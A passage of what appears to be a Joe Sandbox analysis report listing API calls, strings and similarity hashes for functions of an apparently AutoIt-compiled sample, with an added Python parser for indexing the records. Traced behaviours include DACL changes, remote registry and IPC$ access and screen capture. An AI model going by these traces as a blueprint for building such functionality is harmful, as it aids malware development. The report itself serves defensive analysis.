• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: c96ee8f780e0a1d05d0bd5b8eb39af3c6a9b7a7308fb04857b9c90fba4a2b38f
• Instruction ID: 1fa85f4b3097fcc2a15f701b47ba46614a21c8d177bec2f7a314f97084c8e3cd
• Opcode Fuzzy Hash: c96ee8f780e0a1d05d0bd5b8eb39af3c6a9b7a7308fb04857b9c90fba4a2b38f
• Instruction Fuzzy Hash: 5B515B71104305AFC704EF10D98196AB7F9EFA9718F10886CF89A972A1EB71EE05CF52
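The function records in this report (an APIs table, the Memory Dump Source, and the Similarity block with its API ID, String ID and Opcode ID) are far easier to pivot on when parsed than when read by eye: which function drives mciSendStringW, which string table belongs to which Opcode ID, which records share a dump region. The Python below is an added example written for this page, not code from Joe Sandbox or its IDA plugin. It assumes the plain-text layout as shown here: one "• Name.MODULE(args), ref: ADDR" line per call (the args and the comma are absent for LIBCMT helpers such as GetDriveTypeW.KERNEL32 ref: ...), "Part of subcall function ADDR:" prefixes for calls made in a callee, "• Key: Value" lines in the other blocks, and "$" as the separator Joe Sandbox uses to join strings in String ID. The sample input is constructed from two records of this section.

```python
"""Parser for the per-function records the Joe Sandbox IDA plugin exports (the
'APIs / Strings / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity' blocks)."""
import re
from collections import defaultdict

# Constructed sample: two records copied from this section of the report; the
# "Download File" link text that trails Associated lines on the page is dropped.
SAMPLE = """\
APIs
• CharUpperBuffW.USER32(?,?), ref: 001D6FF9
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001D7044
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• Opcode ID: 9e8062b2dbbf04a64b8fda0b59be1c0fa0a71a6a8d7325762015f6ebb83d7565
APIs
  • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
• CharLowerBuffW.USER32(?,?), ref: 001BDB26
• GetDriveTypeW.KERNEL32 ref: 001BDB73
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001BDBBB
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• Opcode ID: c96ee8f780e0a1d05d0bd5b8eb39af3c6a9b7a7308fb04857b9c90fba4a2b38f
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
TARGET = {"Memory Dump Source": "dump", "Joe Sandbox IDA Plugin": "plugin", "Similarity": "similarity"}
# "• Name.MODULE(args), ref: ADDR"; args and the comma are optional, and calls made
# inside a callee carry a "Part of subcall function ADDR:" prefix (assumed layout).
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


def parse_records(text):
    """Split the export into records (one per 'APIs' header) of parsed fields."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":  # every function record opens with its APIs table
                current = {"apis": [], "dump": {}, "plugin": {}, "similarity": {}}
                records.append(current)
            section = line
            continue
        if not line or current is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                current["apis"].append({
                    "name": m["name"], "module": m["module"], "ref": m["ref"],
                    "args": m["args"].split(",") if m["args"] is not None else [],
                    "subcall_of": m["subcall"],
                })
        elif section in TARGET and (m := KV_RE.match(line)):
            if m["key"] == "Associated":  # one line per associated dump region
                current["dump"].setdefault("Associated", []).append(m["value"])
            else:
                current[TARGET[section]][m["key"]] = m["value"]
    return records


def api_sequence(record, include_subcalls=False):
    """Ordered API names of one function; callee ('Part of subcall') entries only on request."""
    return [a["name"] for a in record["apis"] if include_subcalls or a["subcall_of"] is None]


def strings(record):
    """String table from 'String ID'. '$' is the joiner, so a literal '$' in a string is
    indistinguishable from a separator; blanks inside the table (' wait', 'open ') are kept."""
    sid = record["similarity"].get("String ID", "")
    return sid.split("$") if sid else []


def index_by_api(records):
    """API name -> Opcode IDs of the functions that call it directly (the pivot for
    questions like 'which function drives mciSendStringW?')."""
    index = defaultdict(list)
    for rec in records:
        opcode_id = rec["similarity"].get("Opcode ID")
        for name in dict.fromkeys(api_sequence(rec)):  # dedupe, keep call order
            if opcode_id and opcode_id not in index[name]:
                index[name].append(opcode_id)
    return dict(index)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for rec in recs:
        print(rec["similarity"]["Opcode ID"][:16], api_sequence(rec), strings(rec))
    print(index_by_api(recs))
```

Run against the full function listing of a report, the index tells you at once which Opcode IDs to inspect for the CD-tray control (mciSendStringW with "set cd door open") or the TreeView command dispatcher (SendMessageW with the CHECK/COLLAPSE/GETTEXT table), and the Opcode ID and API String ID fields give you values to search for in other reports of the same family.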
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,001E4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 001B3145
                                                                                                                              • LoadStringW.USER32(00000000,?,001E4085,00000016), ref: 001B314E
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,001E4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 001B3170
                                                                                                                              • LoadStringW.USER32(00000000,?,001E4085,00000016), ref: 001B3173
                                                                                                                              • __swprintf.LIBCMT ref: 001B31B3
                                                                                                                              • __swprintf.LIBCMT ref: 001B31C5
                                                                                                                              • _wprintf.LIBCMT ref: 001B326C
                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001B3283
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                              • API String ID: 984253442-2268648507
                                                                                                                              • Opcode ID: 3e875b5aad245c732420877fc42634d4d16289ad94520532aaeb4846f389b81b
                                                                                                                              • Instruction ID: 108a1dd89027f1f36ef618dc56cf95fe33d9637e676406614cda6e18e6f6e409
                                                                                                                              • Opcode Fuzzy Hash: 3e875b5aad245c732420877fc42634d4d16289ad94520532aaeb4846f389b81b
                                                                                                                              • Instruction Fuzzy Hash: 60415372940219BACB14FBD0DD87EEEB77DAF28701F104065F205B20A2EB756F54CAA0
                                                                                                                              APIs
                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 001BD96C
                                                                                                                              • __swprintf.LIBCMT ref: 001BD98E
                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 001BD9CB
                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 001BD9F0
                                                                                                                              • _memset.LIBCMT ref: 001BDA0F
                                                                                                                              • _wcsncpy.LIBCMT ref: 001BDA4B
                                                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 001BDA80
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 001BDA8B
                                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 001BDA94
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 001BDA9E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                              • String ID: :$\$\??\%s
                                                                                                                              • API String ID: 2733774712-3457252023
                                                                                                                              • Opcode ID: 31846e78bdd7b19a5dc4196b1e58c1c850c3bf040438dcb0be5e809002530cb0
                                                                                                                              • Instruction ID: 622de0a80490b8049c854dd05bc0469704a405eb2cca4caf3c810a53d830afc6
                                                                                                                              • Opcode Fuzzy Hash: 31846e78bdd7b19a5dc4196b1e58c1c850c3bf040438dcb0be5e809002530cb0
                                                                                                                              • Instruction Fuzzy Hash: 0A31A676600209AADF20DFA4EC49FEE77BDBF84704F1481A5F519D2061E7709A81CBA1
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,001DBD04,?,?), ref: 001DE564
                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,001DBD04,?,?,00000000,?), ref: 001DE57B
                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,001DBD04,?,?,00000000,?), ref: 001DE586
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,001DBD04,?,?,00000000,?), ref: 001DE593
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 001DE59C
                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,001DBD04,?,?,00000000,?), ref: 001DE5AB
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 001DE5B4
                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,001DBD04,?,?,00000000,?), ref: 001DE5BB
                                                                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001DE5CC
                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,001FD9BC,?), ref: 001DE5E5
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 001DE5F5
                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 001DE619
                                                                                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 001DE644
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 001DE66C
                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001DE682
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3840717409-0
                                                                                                                              • Opcode ID: 0d78eb0f216bcf7c0ff6bed45cafd1bd31adae8adbb370c9ba9dd027e30ee9f4
                                                                                                                              • Instruction ID: 2fa79c4960512c42823fbca2747e87e0a8e5a9af243c94f2a3faba5286f28e52
                                                                                                                              • Opcode Fuzzy Hash: 0d78eb0f216bcf7c0ff6bed45cafd1bd31adae8adbb370c9ba9dd027e30ee9f4
                                                                                                                              • Instruction Fuzzy Hash: BB413B75600204BFDB11AF65EC88EBE7BBAEF89716F108059F905DB260D7319D41DB60
                                                                                                                              APIs
                                                                                                                              • __wsplitpath.LIBCMT ref: 001C0C93
                                                                                                                              • _wcscat.LIBCMT ref: 001C0CAB
                                                                                                                              • _wcscat.LIBCMT ref: 001C0CBD
                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 001C0CD2
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 001C0CE6
                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 001C0CFE
                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 001C0D18
                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 001C0D2A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                              • String ID: *.*
                                                                                                                              • API String ID: 34673085-438819550
                                                                                                                              • Opcode ID: 4f81ea299b3d15f1b68a2f7e1a3e631f8888eee8a840fdc43af588797f310e18
                                                                                                                              • Instruction ID: f0ab33331d1c4eae0e1085a4d4b20fe5e83b7fd74579aba01d4761b3e362f89f
                                                                                                                              • Opcode Fuzzy Hash: 4f81ea299b3d15f1b68a2f7e1a3e631f8888eee8a840fdc43af588797f310e18
                                                                                                                              • Instruction Fuzzy Hash: A2819F71504205DFCB25DF64C844FAAB7E8ABA9314F14896EE88AC7251E734ED84CB92
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001AB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 001AB903
                                                                                                                                • Part of subcall function 001AB8E7: GetLastError.KERNEL32(?,001AB3CB,?,?,?), ref: 001AB90D
                                                                                                                                • Part of subcall function 001AB8E7: GetProcessHeap.KERNEL32(00000008,?,?,001AB3CB,?,?,?), ref: 001AB91C
                                                                                                                                • Part of subcall function 001AB8E7: RtlAllocateHeap.NTDLL(00000000,?,001AB3CB), ref: 001AB923
                                                                                                                                • Part of subcall function 001AB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 001AB93A
                                                                                                                                • Part of subcall function 001AB982: GetProcessHeap.KERNEL32(00000008,001AB3E1,00000000,00000000,?,001AB3E1,?), ref: 001AB98E
                                                                                                                                • Part of subcall function 001AB982: RtlAllocateHeap.NTDLL(00000000,?,001AB3E1), ref: 001AB995
                                                                                                                                • Part of subcall function 001AB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,001AB3E1,?), ref: 001AB9A6
                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001AB5F7
                                                                                                                              • _memset.LIBCMT ref: 001AB60C
                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001AB62B
                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 001AB63C
                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 001AB679
                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001AB695
                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 001AB6B2
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001AB6C1
                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 001AB6C8
                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001AB6E9
                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 001AB6F0
                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001AB721
                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001AB747
                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001AB75B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2347767575-0
                                                                                                                              • Opcode ID: 03a5028122cee031c337acdf71966c6c457364c5efcca8375debb0a1527e78af
                                                                                                                              • Instruction ID: 10cf87dc0aa0eacd53e26a73dff15ed8a64b7fe0646dc0f766e2993bf0225e84
                                                                                                                              • Opcode Fuzzy Hash: 03a5028122cee031c337acdf71966c6c457364c5efcca8375debb0a1527e78af
                                                                                                                              • Instruction Fuzzy Hash: AF517A79900249AFCF009FA4DC85EFEBB7AFF45304F048129F915A7292DB749A45CB60
                                                                                                                              APIs
                                                                                                                              • GetDC.USER32(00000000), ref: 001CA2DD
                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 001CA2E9
                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 001CA2F5
                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 001CA302
                                                                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 001CA356
                                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 001CA392
                                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 001CA3B6
                                                                                                                              • SelectObject.GDI32(00000006,?), ref: 001CA3BE
                                                                                                                              • DeleteObject.GDI32(?), ref: 001CA3C7
                                                                                                                              • DeleteDC.GDI32(00000006), ref: 001CA3CE
                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 001CA3D9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                              • String ID: (
                                                                                                                              • API String ID: 2598888154-3887548279
                                                                                                                              APIs
                                                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,001D2AA6,?,?), ref: 001D3B0E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharUpper
                                                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E"
                                                                                                                              • API String ID: 3964851224-51274421
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,001E3C64,00000010,00000000,Bad directive syntax error,0020DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 001B32D1
                                                                                                                              • LoadStringW.USER32(00000000,?,001E3C64,00000010), ref: 001B32D8
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • _wprintf.LIBCMT ref: 001B3309
                                                                                                                              • __swprintf.LIBCMT ref: 001B332B
                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001B3395
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"#
                                                                                                                              • API String ID: 1506413516-826845855
                                                                                                                              APIs
                                                                                                                              • LoadStringW.USER32(00000066,?,00000FFF), ref: 001BD567
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 001BD589
                                                                                                                              • __swprintf.LIBCMT ref: 001BD5DC
                                                                                                                              • _wprintf.LIBCMT ref: 001BD68D
                                                                                                                              • _wprintf.LIBCMT ref: 001BD6AB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                              • API String ID: 2116804098-2391861430
                                                                                                                              APIs
                                                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 001BD37F
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001BD3A0
                                                                                                                              • __swprintf.LIBCMT ref: 001BD3F3
                                                                                                                              • _wprintf.LIBCMT ref: 001BD499
                                                                                                                              • _wprintf.LIBCMT ref: 001BD4B7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                              • API String ID: 2116804098-3420473620
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00177E53: _memmove.LIBCMT ref: 00177EB9
                                                                                                                              • _memset.LIBCMT ref: 001AAF74
                                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001AAFA9
                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001AAFC5
                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001AAFE1
                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 001AB00B
                                                                                                                              • CLSIDFromString.COMBASE(?,?), ref: 001AB033
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001AB03E
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001AB043
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                              • API String ID: 1411258926-22481851
                                                                                                                              APIs
                                                                                                                              • __swprintf.LIBCMT ref: 001B7226
                                                                                                                              • __swprintf.LIBCMT ref: 001B7233
                                                                                                                                • Part of subcall function 0019234B: __woutput_l.LIBCMT ref: 001923A4
                                                                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 001B725D
                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 001B7269
                                                                                                                              • LockResource.KERNEL32(00000000), ref: 001B7276
                                                                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 001B7296
                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 001B72A8
                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 001B72B7
                                                                                                                              • LockResource.KERNEL32(?), ref: 001B72C3
